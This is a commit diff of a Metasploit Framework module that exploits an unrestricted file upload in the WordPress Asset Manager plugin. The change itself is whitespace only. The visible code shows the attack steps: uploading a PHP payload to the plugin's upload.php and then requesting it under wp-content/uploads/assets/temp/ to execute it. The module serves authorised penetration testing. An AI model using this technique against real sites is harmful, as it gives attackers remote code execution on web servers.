2
2
# This file is part of the Metasploit Framework and may be subject to
3
3
# redistribution and commercial restrictions. Please see the Metasploit
4
4
# Framework web site for more information on licensing and terms of use.
5
- # http://metasploit.com/framework/
5
+ # http://metasploit.com/framework/
6
6
##
7
7
8
8
require 'msf/core'
@@ -24,7 +24,7 @@ def initialize(info = {})
24
24
} ,
25
25
'Author' =>
26
26
[
27
- 'Sammy FORGIT' , # initial discovery
27
+ 'Sammy FORGIT' , # initial discovery
28
28
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
29
29
] ,
30
30
'License' => MSF_LICENSE ,
@@ -40,7 +40,7 @@ def initialize(info = {})
40
40
'BadChars' => "\x00 " ,
41
41
} ,
42
42
'Platform' => 'php' ,
43
- 'Arch' => ARCH_PHP ,
43
+ 'Arch' => ARCH_PHP ,
44
44
'Targets' =>
45
45
[
46
46
[ 'Generic (PHP Payload)' , { 'Arch' => ARCH_PHP , 'Platform' => 'php' } ] ,
@@ -68,10 +68,10 @@ def exploit
68
68
69
69
print_status ( "#{ peer } - Uploading payload #{ payload_name } " )
70
70
res = send_request_cgi ( {
71
- 'method' => 'POST' ,
72
- 'uri' => "#{ uri } wp-content/plugins/asset-manager/upload.php" ,
73
- 'ctype' => "multipart/form-data; boundary=#{ data . bound } " ,
74
- 'data' => post_data
71
+ 'method' => 'POST' ,
72
+ 'uri' => "#{ uri } wp-content/plugins/asset-manager/upload.php" ,
73
+ 'ctype' => "multipart/form-data; boundary=#{ data . bound } " ,
74
+ 'data' => post_data
75
75
} )
76
76
77
77
if not res or res . code != 200 or res . body !~ /#{ payload_name } /
@@ -80,8 +80,8 @@ def exploit
80
80
81
81
print_status ( "#{ peer } - Executing payload #{ payload_name } " )
82
82
res = send_request_raw ( {
83
- 'uri' => "#{ uri } wp-content/uploads/assets/temp/#{ payload_name } " ,
84
- 'method' => 'GET'
83
+ 'uri' => "#{ uri } wp-content/uploads/assets/temp/#{ payload_name } " ,
84
+ 'method' => 'GET'
85
85
} )
86
86
87
87
if res and res . code != 200
0 commit comments